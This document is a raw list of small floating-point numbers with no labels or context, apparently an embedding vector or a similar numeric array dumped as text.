0.0035162020940333605, -0.004944659303873777, -0.0141481664031744, -0.008548008278012276, -0.01355708111077547, 0.02083955891430378, 0.05125773698091507, -0.012844746932387352, 0.00394057109951973, -0.003607138292863965, 0.006642135791480541, -0.022264227271080017, -0.005221256986260414, -0.007263533771038055, 0.013056931085884571, 0.005850232671946287, -0.005225046072155237, 0.009131516329944134, -0.025431839749217033, -0.022764377295970917, 0.005865388549864292, 0.012390065006911755, 0.02997865341603756, 0.014314882457256317, 0.0021294241305440664, 0.017444605007767677, -0.005998004227876663, 0.010222751647233963, 0.042164113372564316, -0.010215173475444317, 0.0250984076410532, -0.03055458329617977, -0.024370918050408363, 0.016989924013614655, 0.018854117020964622, 0.002252566860988736, 0.007926610298454762, -0.01038946770131588, 0.026523075997829437, -0.00857832096517086, 0.005797186400741339, -0.010889616794884205, -0.016004782170057297, -0.002466646023094654, 0.009351278655230999, 0.013504034839570522, 0.0058843339793384075, -0.011268517933785915, 0.018687400966882706, 0.008206997066736221, -0.013003884814679623, -0.008661678992211819, -0.000600084604229778, -0.0027356657665222883, 0.007100606337189674, 0.034404218196868896, 0.01314028911292553, -0.005728984251618385, 0.002277195453643799, 0.016383683308959007, 0.002332136267796159, 0.0069604129530489445, 0.01195811852812767, -0.04343722015619278, -0.025810740888118744, -0.004126232583075762, -0.026614012196660042, -0.014595270156860352, -0.004683217499405146, -0.0007109131547622383, 0.0007113867904990911, -0.0026466241106390953, -0.020763779059052467, -0.024264825507998466, -0.019490672275424004, 0.013329739682376385, -0.001974074635654688, 0.00851011835038662, 0.010942663066089153, -0.017202109098434448, -0.00951799564063549, 0.03525295853614807, 0.036465439945459366, 0.02873585745692253, 0.02033941075205803, -0.00046202249359339476, -0.008532851934432983, 0.04225504770874977, -0.012473423965275288, 0.028447892516851425, -0.013989027589559555, 0.007081661373376846, -0.01483776606619358, -0.00916940625756979, 0.024628570303320885, 0.01865709014236927, 0.03443453088402748, 0.011882337741553783, -0.01242037769407034, -0.0020650108344852924, 0.016504930332303047, 0.009684711694717407, 0.014102698303759098, 0.000995562644675374, -0.005698672495782375, 0.014004183933138847, 0.02002113312482834, 0.0009107834775932133, -0.007684113923460245, 0.0019608130678534508, -0.027386970818042755, -0.00948010478168726, 0.009192139841616154, 0.012890215031802654, 0.022688597440719604, 0.022612815722823143, -0.00019975191389676183, -0.022749220952391624, 0.030190838500857353, 0.005903278943151236, -0.05541049316525459, -0.03873884677886963, -0.015595568343997002, 0.009427058510482311, -0.0069945137947797775, -0.010495560243725777, 0.0012465845793485641, 0.01257951557636261, 0.026947444304823875, -0.0017666262574493885, 0.004489977844059467, 0.0013678328832611442, -0.014481599442660809, -0.005581213161349297, 0.02991802990436554, -0.005221256986260414, -0.004171701148152351, 0.024992315098643303, -0.025431839749217033, 0.0018698768690228462, -0.005857810843735933, -0.009593775495886803, 0.02478013001382351, 0.005441019777208567, 0.03367672860622406, -0.03867822140455246, -0.026129018515348434, -0.04089100658893585, -0.02347671054303646, 0.003546514082700014, -0.0032888613641262054, -0.006418584380298853, 0.00910120364278555, -0.007460562512278557, 0.01351919025182724, -0.025507621467113495, 0.005171999800950289, -0.0032755997963249683, -0.04307347536087036, 0.028266020119190216, 0.024946847930550575, 0.006895999889820814, -0.002830391051247716, -0.025553088635206223, 0.009313388727605343, 0.015156043693423271, 0.008691990748047829, -0.007703058887273073, 0.002756505273282528, 0.020763779059052467, -0.016686804592609406, -0.0016453779535368085, -0.0025916832964867353, -0.027750715613365173, 0.015292447991669178, 0.011268517933785915, -0.008350979536771774, -0.006373116280883551, 0.020324254408478737, 0.030024122446775436, -0.009775647893548012, -0.0009406219469383359, 0.0024363340344280005, 0.003080465830862522, 0.013269116170704365, 0.04013320431113243, -0.016262434422969818, -0.00229992950335145, 0.0043876743875443935, 0.017429450526833534, 0.006429951172322035, 0.017702259123325348, -0.051742732524871826, 0.0009136252338066697, -0.027553686872124672, -0.022430943325161934, -0.004148966632783413, -0.02967553213238716, -0.00031401426531374454, 0.004107287619262934, 0.02177923358976841, 0.007271111942827702, 0.025446996092796326, -0.015747129917144775, 0.012640140019357204, -0.007487085182219744, -0.0033191735856235027, -0.0001342730683973059, 0.027341501787304878, 0.006278390996158123, -0.004649116192013025, 0.022582504898309708, 0.018823806196451187, 0.008896597661077976, -0.014868078753352165, -0.007661379873752594, -0.003224448300898075, -0.04392221197485924, 0.020051445811986923, -0.003510518465191126, -0.0034138988703489304, 0.005543322768062353, -0.004830988589674234, -0.009336122311651707, 0.010313687846064568, 0.03016052581369877, 0.005804764572530985, -0.02347671054303646, -0.005035595502704382, 0.0048347776755690575, -0.018172096461057663, -0.019854417070746422, 0.004649116192013025, -0.004277793224900961, 0.02717478573322296, 0.01633821427822113, -0.02728087827563286, 0.0037359646521508694, 0.010124237276613712, -0.02728087827563286, -0.01132914237678051, -0.010404624044895172, -0.015974469482898712, 0.006501942407339811, 0.014231524430215359, -0.004743841476738453, -0.006301125045865774, 0.019733168184757233, -0.012291551567614079, -0.018505528569221497, 0.045407507568597794, -0.014201212674379349, -0.011730777099728584, 0.017762882634997368, 0.01323880348354578, 0.019490672275424004, 0.01952098309993744, -0.024325449019670486, 0.007183964364230633, 0.0011613317765295506, -0.022946249693632126, 0.013731375336647034, 0.010177282616496086, 0.0282963328063488, -0.021627673879265785, 0.0061988215893507, -0.014602847397327423, 0.010525871999561787, 0.011185159906744957, -0.006740650162100792, 0.017353668808937073, -0.013807155191898346, -0.013261537998914719, 0.015360649675130844, 0.005103797651827335, -0.024052640423178673, -0.05841138958930969, -0.011086645536124706, -0.004747630562633276, 0.014390663243830204, 0.0008203208562918007, 0.0066572921350598335, -0.006983147002756596, 0.006297335959970951, 0.017186952754855156, 0.019930196925997734, 0.0036374502815306187, 0.009131516329944134, 0.000796165899373591, 0.010306109674274921, 0.01323880348354578, -0.013526768423616886, -0.022931093350052834, -0.011420078575611115, 0.03655637800693512, 0.002769766841083765, -0.0036526063922792673, 0.011700465343892574, 0.0007047560065984726, 0.02141548879444599, 0.023173591122031212, 0.008214575238525867, -0.0227946899831295, -0.03167613223195076, -0.018732869997620583, -0.006805063225328922, 0.021945951506495476, 0.015300026163458824, 0.007369625847786665, 0.01803569123148918, -0.008964799344539642, 0.016489775851368904, -0.016444306820631027, -0.01871771365404129, -0.002396549331024289, 0.021885326132178307, 0.0028322855941951275, 0.0012409010669216514, 0.015072684735059738, -0.022052042186260223, 0.002616311889141798, -0.008964799344539642, -0.026083551347255707, -0.019263330847024918, 0.0215973611921072, 0.013973872177302837, 0.011086645536124706, 0.008138795383274555, 0.007956922985613346, 0.0311002004891634, -0.018429748713970184, -0.009320966899394989, 0.033646415919065475, 0.011344298720359802, -0.006797485519200563, 0.0012731075985357165, 0.0125492038205266, -0.019672544673085213, -0.0040807644836604595, -0.005505432840436697, 0.0009647769038565457, -0.016853520646691322, 0.005691094323992729, 0.013064509257674217, 0.01007876917719841, -0.0005977164837531745, 0.04595312476158142, 0.011351876892149448, 0.0025121141225099564, 0.018369125202298164, 0.0026750415563583374, -0.02141548879444599, -0.009328545071184635, 0.013776843436062336, 0.02609870582818985, -0.02805383689701557, 0.017565853893756866, 0.02473466284573078, -0.018247876316308975, 0.01977863721549511, -0.017202109098434448, 0.01677774079144001, 0.0013195229694247246, 0.017065703868865967, 0.014133010059595108, 0.03173675388097763, 0.0021748922299593687, -0.0038325844798237085, -0.027583999559283257, -0.005463753826916218, -0.012412799522280693, -0.02717478573322296, 0.00015262608940247446, -0.0033911645878106356, 0.02315843477845192, -0.020945651456713676, 0.002406021812930703, 0.012465845793485641, -0.018808649852871895, 0.009184562601149082, -0.01111695822328329, 0.002671252703294158, 0.011063911952078342, 0.006157142575830221, 0.034828588366508484, 0.017732569947838783, 0.0157016608864069, 0.0004944659303873777, -0.012230927124619484, -0.009851427748799324, 0.0008458966622129083, 0.0016927405958995223, 0.0023624482564628124, 0.005107586737722158, 0.002584105357527733, -0.014542223885655403, 0.012291551567614079, 0.005441019777208567, -0.011336720548570156, -0.012693186290562153, -0.018793493509292603, 0.006320070009678602, 0.0006545516080223024, 0.03443453088402748, -0.0009832483483478427, -0.004023929592221975, 0.009336122311651707, 0.0069452570751309395, -0.008585898205637932, 0.0066572921350598335, 0.0004987285356037319, -0.0009117307490669191, -0.012185459025204182, 0.02867523394525051, -0.015110575594007969, 0.012049054726958275, -0.010427357628941536, 0.004736263304948807, 0.0222945399582386, -0.006293546874076128, -0.015671348199248314, -0.009737757965922356, -0.02171861007809639, 0.027326345443725586, -0.01317817997187376, 0.01815694011747837, -0.009972676634788513, 0.014701361767947674, 0.013860201463103294, -0.024234512820839882, -0.013920825906097889, 0.0022355164401233196, 0.0009699867805466056, 0.003510518465191126, -0.01248100120574236, 0.005202312022447586, -0.005016650538891554, 0.01376926526427269, 0.03149425983428955, 0.006604245863854885, 0.01947551593184471, -0.0022790899965912104, 0.010093924589455128, -0.0034328438341617584, -0.009131516329944134, 0.006013160105794668, 0.02828117646276951, 0.01501963846385479, 0.006566355936229229, -0.006680026184767485, 0.013663172721862793, 0.024067796766757965, -0.014292148873209953, 0.0066724480129778385, -0.01677774079144001, 0.00916940625756979, -0.0005602999590337276, 0.02553793229162693, -0.009048158302903175, 0.002447701059281826, -0.0023112965282052755, 0.011556482873857021, -0.009154249913990498, 0.009995410218834877, 0.014420974999666214, 0.003207397647202015, 0.008964799344539642, -0.007540131453424692, 0.008419182151556015, -0.01752038672566414, -0.003607138292863965, -0.026583699509501457, -0.007187753450125456, 0.006789907347410917, 0.006066206376999617, 0.010760790668427944, -0.02146095782518387, 0.0074264612048864365, -0.001145228510722518, -0.005876755807548761, 0.003690496552735567, -0.0069793579168617725, -0.005240201950073242, 0.0018073581159114838, -0.016550399363040924, -0.0027205098886042833, -0.014731674455106258, 0.0033911645878106356, -0.001819672412239015, 0.009722601622343063, -0.002593577839434147, 0.010897194966673851, -0.013322162441909313, 0.0035484086256474257, -0.02465888299047947, 0.004702162463217974, 0.0045998590067029, 0.006407217122614384, -0.01658071205019951, -0.003671551588922739, -0.029523972421884537, -0.008282777853310108, 0.025765273720026016, -0.00006429477798519656, 0.006585300900042057, -0.011942962184548378, -0.02071831189095974, -0.017884131520986557, 0.023294838145375252, -0.017126329243183136, -0.00581992045044899, -0.010472825728356838, 0.008563164621591568, 0.014913546852767467, 0.009624087251722813, 0.011185159906744957, 0.02015753835439682, 0.011730777099728584, 0.009063313715159893, 0.004652905277907848, 0.0321914367377758, 0.017823506146669388, -0.013625282794237137, -0.004023929592221975, -0.010995709337294102, -0.007703058887273073, 0.006123041268438101, -0.0028133406303822994, 0.011063911952078342, 0.006005581934005022, -0.007934188470244408, 0.002517797751352191, -0.02003628946840763, 0.017793195322155952, 0.0061912438832223415, -0.018490372225642204, -0.012776544317603111, -0.017626479268074036, -0.015004483051598072, 0.01373895350843668, -0.01933911070227623, -0.026841353625059128, -0.006456474307924509, 0.008904175832867622, 0.004573335871100426, -0.017687102779746056, -0.0038193229120224714, -0.02528028003871441, 0.012405221350491047, -0.005979059264063835, -0.004436931572854519, 0.00998025480657816, 0.015822909772396088, -0.007903876714408398, 0.018429748713970184, -0.023749519139528275, -0.0033949536737054586, -0.013185757212340832, 0.008206997066736221, 0.02565918117761612, -0.008373714052140713, -0.029493659734725952, -0.006683815270662308, -0.002280984539538622, -0.030645519495010376, 0.008487383835017681, 0.0013630966423079371, 0.0031448788940906525, 0.01947551593184471, 0.013890514150261879, 0.015989625826478004, -0.01336005236953497, -0.04361909255385399, 0.009495261125266552, 0.02429513819515705, 0.0005944010918028653, -0.015133309178054333, 0.004607437178492546, -0.004925713874399662, 0.015807753428816795, -0.009108781814575195, 0.012738654389977455, -0.0037056526634842157, 0.006285969167947769, 0.016686804592609406, 0.004311894532293081, 0.011670153588056564, 0.005486487876623869, 0.013125133700668812, -0.01233701966702938, 0.004436931572854519, 0.0003909785591531545, -0.004474821966141462, 0.003626083256676793, -0.00929823238402605, 0.020748622715473175, 0.009320966899394989, -0.007339314091950655, 0.003207397647202015, -0.0030956219416111708, -0.009616509079933167, 0.018854117020964622, -0.0046415384858846664, 0.004550601821392775, 0.013663172721862793, 0.0034138988703489304, 0.012791700661182404, -0.004031507298350334, -0.023006873205304146, -0.015989625826478004, -0.0195967648178339, -0.008009969256818295, 0.00585402175784111, 0.01167773175984621, -0.0054751206189394, -0.0014076174702495337, 0.011003287509083748, 0.02091534063220024, 0.01261740643531084, 0.0026731472462415695, 0.008684412576258183, 0.008828395046293736, 0.019111771136522293, 0.0022734066005796194, 0.02171861007809639, 0.005100008565932512, 0.00042223790660500526, 0.00700967013835907, 0.00655498867854476, 0.005001494195312262, -0.020369721576571465, -0.006581511814147234, 0.009389168582856655, -0.002313191071152687, 0.003783327294513583, 0.005956325214356184, -0.008904175832867622, -0.004524079151451588, -0.006229133810847998, -0.007725792936980724, 0.00109881313983351, 0.005342505406588316, -0.0031657186336815357, 0.006369327194988728, -0.01035915594547987, 0.0068164304830133915, -0.004118654876947403, -0.02291593700647354, -0.026553388684988022, -0.00910120364278555, 0.008601054549217224, -0.0034385272301733494, 0.007888720370829105, -0.008517696522176266, 0.005846443586051464, -0.01815694011747837, -0.00007951002044137567, -0.017808351665735245, -0.0023207692429423332, 0.0008274252177216113, 0.0019570239819586277, 0.00425505917519331, -0.012624983675777912, 0.030766768380999565, 0.00630870321765542, 0.017474917694926262, -0.011245784349739552, 0.011124535463750362, 0.02465888299047947, 0.017308201640844345, -0.032585494220256805, 0.0013024724321439862, -0.007460562512278557, -0.010563761927187443, 0.02109721302986145, -0.016535243019461632, -0.013913247734308243, -0.0063844830729067326, -0.0027110371738672256, 0.0014672944089397788, -0.006232922896742821, -0.007218065671622753, 0.02828117646276951, 0.029311787337064743, -0.0032092921901494265, 0.0185964647680521, 0.0009079417213797569, -0.000023873728423495777, 0.006805063225328922, 0.007759894244372845, -0.027765871956944466, -0.0002496010856702924, -0.008548008278012276, 0.03522264584898949, 0.011912650428712368, 0.0042247469536960125, -0.022324852645397186, -0.015807753428816795, -0.009351278655230999, -0.015012061223387718, 0.010677432641386986, -0.015246979892253876, 0.014254258945584297, 0.002750821877270937, 0.006323859095573425, 0.011980852112174034, 0.01783866249024868, -0.020490970462560654, 0.0033722196239978075, -0.01376926526427269, -0.020612219348549843, 0.006145775783807039, -0.014383085072040558, 0.012306706979870796, -0.0041944351978600025, 0.022597661241889, 0.020869871601462364, 0.034131407737731934, 0.027129316702485085, -0.012920526787638664, -0.02083955891430378, -0.01223850529640913, -0.019263330847024918, -0.017868975177407265, 0.014011762104928493, 0.025325749069452286, 0.007384782191365957, 0.022324852645397186, -0.013958715833723545, 0.007134707178920507, -0.006596667692065239, -0.015489475801587105, 0.024689193814992905, 0.009866584092378616, -0.002817129483446479, 0.008494962006807327, 0.01852068491280079, 0.014239102602005005, 0.0018736658385023475, 0.0034233713522553444, 0.005039384588599205, 0.019748324528336525, -0.016944456845521927, -0.0009567252127453685, 0.011844447813928127, 0.005346294492483139, -0.005869177635759115, 0.004482399672269821, -0.012352175079286098, 0.002246883464977145, 0.008017546497285366, 0.009237607941031456, 0.0011859603691846132, 0.011852025985717773, -0.0029289054218679667, -0.005842654500156641, 0.015610724687576294, 0.012564360164105892, 0.014815032482147217, -0.003150562522932887, 0.011806557886302471, 0.02741728164255619, -0.0018736658385023475, -0.018808649852871895, -0.007449195254594088, -0.021112367510795593, 0.008449493907392025, 0.022385476157069206, 0.008767770603299141, -0.026144174858927727, 0.014163322746753693, 0.008252465166151524, 0.012965994887053967, 0.0010561867384240031, 0.0017097911331802607, 0.014004183933138847, -0.005497854668647051, 0.0046415384858846664, -0.010988131165504456, 0.014860500581562519, -0.012427955865859985, 0.017550697550177574, -0.01192022766917944, -0.009608931839466095, 0.002709142630919814, 0.008502540178596973, -0.0224006325006485, 0.0023302417248487473, 0.007843252271413803, -0.004615015350282192, -0.03267642855644226, -0.007987234741449356, 0.01467862818390131, -0.008396447636187077, 0.010336421430110931, 0.013526768423616886, 0.00445966562256217, 0.005308404099196196, -0.022597661241889, -0.010859305039048195, -0.009631665423512459, -0.015049951151013374, -0.013602549210190773, 0.005891911685466766, 0.00007151757745305076, -0.012352175079286098, 0.013610126450657845, 0.013087243773043156, 0.00807817094027996, -0.0074150944128632545, -0.008934487588703632, 0.02341608703136444, 0.008381292223930359, 0.012306706979870796, 0.03328267112374306, 0.0018026218749582767, -0.014466443099081516, -0.002243094379082322, 0.02015753835439682, -0.0250984076410532, -0.0051606325432658195, -0.025553088635206223, -0.004425564780831337, 0.010381889529526234, -0.010927507653832436, 0.008722302503883839, -0.006786118261516094, -0.007608333602547646, -0.005353872198611498, -0.005115164443850517, -0.02334030717611313, -0.0468018613755703, -0.0005048856837674975, -0.001103549380786717, 0.0037965888623148203, -0.011905072256922722, -0.014133010059595108, 0.004198223818093538, -0.024067796766757965, -0.015747129917144775, 0.005531955976039171, 0.004031507298350334, -0.016792895272374153, -0.03404047340154648, 0.016171498224139214, 0.004311894532293081, 0.02384045533835888, 0.022446099668741226, 0.02585620991885662, -0.016110874712467194, -0.0039026811718940735, -0.010048456490039825, 0.004130021668970585, 0.0023719207383692265, -0.016004782170057297, -0.01023790705949068, 0.0188995860517025, 0.023446399718523026, 0.00323960417881608, 0.009616509079933167, -0.016792895272374153, 0.01658071205019951, 0.012177880853414536, 0.017611322924494743, 0.0037549096159636974, 0.014436131343245506, -0.0035692481324076653, 0.01883896254003048, 0.0003881368029396981, -0.013632860966026783, 0.0017050548922270536, -0.02047581411898136, 0.013466144911944866, 0.015284869819879532, 0.007964501157402992, -0.011056333780288696, 0.02515903115272522, 0.012912948615849018, -0.00428916048258543, 0.010146970860660076, -0.006259446032345295, -0.00456954725086689, -0.021733766421675682, -0.005039384588599205, 0.011814136058092117, 0.000258363172179088, 0.01709601655602455, -0.034767962992191315, 0.005323560442775488, -0.004205801989883184, -0.007187753450125456, -0.03053942695260048, 0.0019153449684381485, 0.016611022874712944, -0.006263235118240118, -0.0037871163804084063, -0.023188745602965355, -0.010404624044895172, -0.019566452130675316, -0.004444509744644165, 0.01442855317145586, 0.02765977941453457, -0.006789907347410917, 0.004277793224900961, -0.009283076971769333, -0.0012276394991204143, -0.004391463473439217, -0.00904058013111353, -0.009427058510482311, -0.007790206465870142, 0.004251270089298487, 0.0224006325006485, -0.011063911952078342, -0.011874759569764137, -0.044225335121154785, 0.0014388768468052149, 0.019611919298768044, 0.005793397780507803, 0.01063954271376133, 0.00011722252384060994, -0.017929598689079285, 0.014064808376133442, 0.027447594329714775, -0.007180175743997097, -0.019581608474254608, 0.022264227271080017, -0.013314584270119667, -0.00309941079467535, 0.03143363445997238, -0.01897536590695381, -0.008161528967320919, 0.03437390550971031, 0.013685907237231731, -0.008244887925684452, -0.005581213161349297, -0.03807198256254196, -0.0037946943193674088, 0.008881441317498684, -0.00797965656965971, -0.013284271582961082, -0.004974971059709787, -0.006661081220954657, -0.02735665813088417, -0.01758101023733616, -0.013754108920693398, 0.016868676990270615, 0.0024192833807319403, 0.02803868055343628, -0.0008638944709673524, 0.025068094953894615, 0.005926012992858887, 0.02141548879444599, -0.012867480516433716, -0.008002391085028648, -0.023931391537189484, -0.02003628946840763, -0.00031472471891902387, 0.00047031097346916795, -0.006888421718031168, -0.011435234919190407, 0.022021731361746788, -0.00885870773345232, -0.009768069721758366, -0.003967094235122204, 0.013875357806682587, -0.002415494294837117, 0.004565758164972067, 0.017383981496095657, 0.0019418681040406227, -0.0016681120032444596, 0.004467243794351816, -0.002574632875621319, 0.011033599264919758, -0.013011462986469269, -0.0025822108145803213, -0.0010628175223246217, -0.010821415111422539, -0.030751612037420273, -0.02373436465859413, -0.007941766642034054, -0.00957861915230751, 0.018748026341199875, 0.0019286065362393856, -0.003351380117237568, 0.015595568343997002, -0.004304316360503435, 0.0079493448138237, 0.013579814694821835, 0.002118057105690241, -0.004937081132084131, 0.0289935115724802, 0.013443410396575928, -0.002038487931713462, -0.019702855497598648, -0.005656993016600609, 0.00449376692995429, -0.008434338495135307, 0.005895700771361589, -0.012761388905346394, 0.011874759569764137, -0.014731674455106258, -0.008040281012654305, 0.005232623778283596, 0.005630469880998135, 0.017429450526833534, 0.003690496552735567, -0.015444007702171803, 0.009078470058739185, -0.0019437625305727124, 0.02385561168193817, 0.0026693581603467464, -0.0040618195198476315, 0.02729603461921215, -0.01821756362915039, -0.0109502412378788, -0.006596667692065239, -0.000856790051329881, 0.014367928728461266, 0.0010362945031374693, -0.024325449019670486, 0.014572535641491413, -0.015300026163458824, 0.0111472699791193, 0.004902979824692011, 0.0021711031440645456, -0.015246979892253876, 0.005778241436928511, 0.01389809139072895, -0.001327101024799049, 0.003603349206969142, -0.015413695946335793, 0.007797784171998501, 0.035071082413196564, -0.015125731006264687, 0.0005697724991478026, 0.041588183492422104, -0.005759296473115683, 0.02491653524339199, 0.003703758120536804, 0.00763485673815012, 0.005096219480037689, 0.010866883210837841, 0.005251569207757711, -0.02277953363955021, -0.0004738631541840732, -0.015853220596909523, -0.016853520646691322, 0.011003287509083748, -0.010783525183796883, -0.0006616560276597738, 0.006380694452673197, -0.006634558085352182, -0.0009576724842190742, 0.010200017131865025, 0.004550601821392775, 0.016035092994570732, 0.019111771136522293, 0.0060775731690227985, 0.03692012280225754, -0.009874162264168262, 0.01583806611597538, 0.015231823548674583, 0.00777505012229085, 0.014966593123972416, -0.002731876913458109, 0.0012295340420678258, -0.003932993393391371, 0.006710338406264782, 0.005838865879923105, -0.008434338495135307, -0.008100905455648899, 0.0006280285306274891, -0.012488579377532005, -0.012556781992316246, -0.017429450526833534, 0.011548904702067375, -0.021567050367593765, 0.002387076849117875, 0.005922223906964064, -0.012723498046398163, 0.0051265317015349865, 0.026250267401337624, -0.04571062698960304, 0.0072862678207457066, -0.01971801184117794, -0.009328545071184635, 0.025492465123534203, 0.004959815181791782, -0.016004782170057297, -0.01908145844936371, 0.012693186290562153, -0.017490074038505554, 0.00020046235295012593, -0.005278091877698898, 0.009608931839466095, 0.0024268613196909428, -0.006649713963270187, -0.009942363947629929, -0.030584895983338356, -0.0021161625627428293, -0.008388870395720005, 0.013496456667780876, 0.02717478573322296, -0.03035755455493927, -0.00513032078742981, 0.01282959058880806, -0.0025026416406035423, 0.032949239015579224, 0.0038382678758352995, 0.005012861452996731, -0.008237309753894806, 0.010715322569012642, -0.03267642855644226, -0.003936782479286194, -0.004228536039590836, 0.0025386372581124306, -0.001382041722536087, -0.012988729402422905, -0.011882337741553783, -0.0023207692429423332, 0.017186952754855156, -0.012215770781040192, -0.000011574244126677513, 0.005342505406588316, 0.0024988525547087193, -0.018353968858718872, 0.016110874712467194, -0.005759296473115683, 0.015459164045751095, 0.00021052690863143653, 0.0069755688309669495, -0.020051445811986923, 0.01595931313931942, 0.00007228722097352147, -0.010253063403069973, 0.003997406456619501, -0.022052042186260223, -0.0077333711087703705, 0.008563164621591568, -0.009677133522927761, -0.020430346950888634, -0.00042744778329506516, 0.005376606248319149, -0.007623489946126938, 0.0075742327608168125, 0.024264825507998466, 0.007797784171998501, 0.0025822108145803213, -0.012359753251075745, -0.005217467900365591, 0.0017912548501044512, 0.023052342236042023, 0.0018035691464319825, 0.0005077274399809539, -0.000968092237599194, 0.000558405474293977, 0.006482997443526983, -0.009510417468845844, 0.006255656946450472, 0.010541028343141079, 0.010616808198392391, 0.012746232561767101, -0.01965738832950592, 0.004111076705157757, 0.003173296572640538, -0.035647012293338776, 0.0021010064519941807, -0.011556482873857021, 0.015027216635644436, 0.005857810843735933, 0.008979955688118935, -0.0022696175146847963, -0.0012058527208864689, -0.0062215556390583515, -0.029205694794654846, -0.0016832681139931083, 0.0037946943193674088, -0.00028038679738529027, 0.005891911685466766, -0.029690688475966454, 0.00205743289552629, 0.004141388926655054, 0.03843572735786438, -0.004281582310795784, -0.0043535735458135605, 0.01583806611597538, 0.013117555528879166, 0.013807155191898346, -0.023885924369096756, -0.005763085559010506, 0.007202909793704748, 0.008911753073334694, -0.0009396746754646301, -0.005278091877698898, -0.02103658765554428, -0.012912948615849018, -0.0020858505740761757, -0.004327050410211086, 0.015686504542827606, -0.012534047476947308, -0.02434060536324978, 0.009048158302903175, 0.004906768910586834, 0.0013725691242143512, 0.022734064608812332, 0.00010745397594291717, -0.03060005232691765, -0.004402830731123686, 0.0011253361590206623, -0.003105094423517585, 0.00904058013111353, -0.021794389933347702, -0.01627759076654911, -0.005065907258540392, 0.011594372801482677, 0.0023056131321936846, 0.0003476417332421988, -0.018884429708123207, -0.001065659336745739, -0.020127225667238235, -0.016035092994570732, -0.009086048230528831, -0.015390962362289429, 0.01213999092578888, 0.006536043714731932, 0.002476118505001068, -0.017050549387931824, -0.0020782724022865295, -0.0125492038205266, 0.022582504898309708, 0.006456474307924509, -0.00456954725086689, 0.0039216261357069016, -0.009343700483441353, 0.03185800462961197, -0.00235487031750381, 0.005804764572530985, -0.005865388549864292, 0.006092729512602091, 0.0037852218374609947, -0.004095920827239752, -0.0041944351978600025, 0.011753511615097523, 0.005058329552412033, 0.014746829867362976, -0.0035730372183024883, -0.00948010478168726, 0.007403727155178785, 0.014564957469701767, -0.020309098064899445, -0.013117555528879166, 0.00449376692995429, -0.00032514450140297413, 0.0056077358312904835, 0.010866883210837841, -0.0075552877970039845, -0.010715322569012642, 0.017793195322155952, 0.017126329243183136, -0.03692012280225754, 0.02346155419945717, 0.005603947211056948, -0.015292447991669178, 0.0193997360765934, 0.01551978848874569, 0.005513010546565056, 0.00453544594347477, 0.01915723830461502, -0.014474021270871162, -0.009684711694717407, 0.003963305149227381, 0.01226881705224514, -0.012988729402422905, -0.004698373377323151, -0.013966294005513191, 0.007684113923460245, -0.027947744354605675, 0.009358856827020645, 0.001219114288687706, -0.015080262906849384, -0.004596069920808077, -0.01808116026222706, 0.009313388727605343, 0.015489475801587105, 0.009116359986364841, 0.026947444304823875, -0.013701063580811024, 0.009495261125266552, 0.014246680773794651, -0.0027583998162299395, 0.017293045297265053, 0.014276992529630661, -0.007873564958572388, 0.009608931839466095, 0.009207296185195446, -0.0061912438832223415, -0.0035673535894602537, 0.000888996641151607, -0.009987832978367805, -0.006320070009678602, 0.024143576622009277, 0.008297933265566826, 0.019005678594112396, -0.011526171118021011, -0.019414890557527542, -0.012806857004761696, -0.006153353489935398, 0.020051445811986923, -0.009010267443954945, 0.011829291470348835, 0.002610628493130207, 0.007941766642034054, -0.0015534944832324982, -0.013504034839570522, 0.02471950650215149, 0.011852025985717773, -0.006115463562309742, 0.005531955976039171, -0.010093924589455128, -0.007305212784558535, 0.026022925972938538, -0.004300527274608612, 0.010533450171351433, 0.01364043913781643, -0.006539832800626755, 0.014322460629045963, -0.027841651812195778, -0.01107906736433506, 0.015072684735059738, -0.023507023230195045, -0.004141388926655054, -0.006661081220954657, -0.01803569123148918, 0.015974469482898712, 0.016808051615953445, -0.006733072455972433, 0.009161828085780144, -0.0018168307142332196, -0.001824408769607544, 0.006437529344111681, 0.00041300218435935676, -0.009002689272165298, 0.01897536590695381, -0.0033949536737054586, -0.023446399718523026, -0.003002790967002511, 0.0043687294237315655, -0.0003625609679147601, -0.004023929592221975, -0.00948010478168726, 0.022673441097140312, 0.0025159032084047794, 0.012761388905346394, -0.015989625826478004, -0.008669257164001465, -0.02053643949329853, 0.006710338406264782, 0.005562267731875181, 0.004323261324316263, 0.005645626224577427, -0.001083657145500183, -0.008222153410315514, 0.009495261125266552, 0.005315982270985842, 0.0005048856837674975, -0.016035092994570732, -0.028326645493507385, 0.0069604129530489445, 0.02591683343052864, -0.019354267045855522, 0.0017628372879698873, 0.0027375603094697, -0.02753853052854538, 0.0010864988435059786, -0.013375207781791687, 0.016368526965379715, -0.006805063225328922, -0.006748228333890438, -0.0014644527109339833, -0.013231226243078709, -0.002479907590895891, 0.0016586395213380456, -0.021491268649697304, 0.017626479268074036, -0.025825897231698036, 0.008108483627438545, -0.019430046901106834, 0.0008492120541632175, 0.002485590986907482, -0.009245186112821102, 0.002504536183550954, 0.016201810911297798, -0.010124237276613712, -0.00766895804554224, -0.007631067652255297, -0.008017546497285366, 0.02584105357527733, -0.022506725043058395, 0.0013176285428926349, 0.0012115362333133817, -0.0011528065660968423, -0.012534047476947308, -0.0014625581679865718, 0.02146095782518387, 0.0020877448841929436, -0.0009553043637424707, -0.0015885428292676806, -0.028690390288829803, 0.004906768910586834, 0.023507023230195045, 0.025992615148425102, 0.017565853893756866, 0.0137995770201087, 0.011238206177949905, -0.0077333711087703705, -0.01977863721549511, 0.010783525183796883, 0.009320966899394989, 0.014534645713865757, 0.005672149360179901, -0.031130513176321983, 0.012882636860013008, 0.0031770856585353613, 0.012534047476947308, 0.014890812337398529, -0.00998025480657816, -0.020354565232992172, -0.005766874644905329, -0.01107906736433506, -0.007161230314522982, -0.0008998900884762406, 0.014314882457256317, -0.012776544317603111, 0.015822909772396088, 0.008335824124515057, 0.011389766819775105, -0.005058329552412033, 0.0158986896276474, -0.0016179076628759503, 0.011283674277365208, -0.005660782102495432, 0.01871771365404129, -0.0018774548079818487, 0.013716218993067741, 0.0032471823506057262, -0.001061870250850916, 0.002146474551409483, -0.004236114211380482, -0.02009691298007965, -0.003156245918944478, 0.01310997735708952, -0.006949045695364475, 0.025507621467113495, -0.017232421785593033, 0.023628272116184235, 0.011170003563165665, 0.010222751647233963, -0.013428254052996635, -0.01433003880083561, -0.01229912880808115, 0.0188995860517025, 0.001508026267401874, -0.02497715875506401, 0.014072386547923088, -0.011276096105575562, -0.0013242593267932534, 0.0028550196439027786, -0.0009785119909793139, 0.004770364612340927, -0.002252566860988736, 0.003178979968652129, -0.019490672275424004, -0.008063014596700668, 0.0024818021338433027, 0.021673141047358513, 0.012564360164105892, 